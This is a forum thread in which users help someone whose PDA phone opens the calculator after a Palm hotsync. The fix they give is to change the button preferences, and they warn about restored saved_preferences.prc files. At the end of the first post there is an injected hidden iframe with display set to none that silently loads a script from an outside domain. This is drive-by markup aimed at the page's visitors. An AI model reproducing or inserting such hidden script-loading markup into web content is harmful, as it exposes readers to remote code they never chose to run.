+ Reply to Thread

Thread: Calculator

Calculator

I finally my ophone but after syching it - now when I press the phone key I get the calcualtor- Anyone know how to fix?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar
    You probably synced off an old Palm Pilot -- and restored your old preferences. Go to prefs (I think it's on the 7135, PDA prefs), click in the top-right popdown menu to 'buttons'. and change the calc button preference there.
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

Thanks
    that worked!!!

If you did a hotsynch without deleting saved_preferences.prc from your backup folder, the calculator will probably be the least of your problems. The phone comes with an "IMportant - Read Me!" card and this is the #1 item. It is also in the beginning of the hard copy user guide, and the pdf reference guide.

Alan

Originally posted by alanb
    If you did a hotsynch without deleting saved_preferences.prc from your backup folder, the calculator will probably be the least of your problems. The phone comes with an "IMportant - Read Me!" card and this is the #1 item. It is also in the beginning of the hard copy user guide, and the pdf reference guide.
    Heheh... What are you trying to say, Alan?

Before loading too many apps and data I would recommend hard resetting your phone and uninstalling the palm desktop. Make sure to delete your Palm folder after uninstall if needed.

Alan is right about the least of your problems. Not that I necessarily know from experience. Ok, yes I do. The same thing happened to me when i converted to my 6035 from my Palm V

Originally posted by MikeW
    Heheh... What are you trying to say, Alan?
    I don't read EVERY manual cover to cover (actually I do, but that's just me....), but I at least glance at the first few pages and read the cards that say IMPORTANT - READ ME! or other dire warnings....

Alan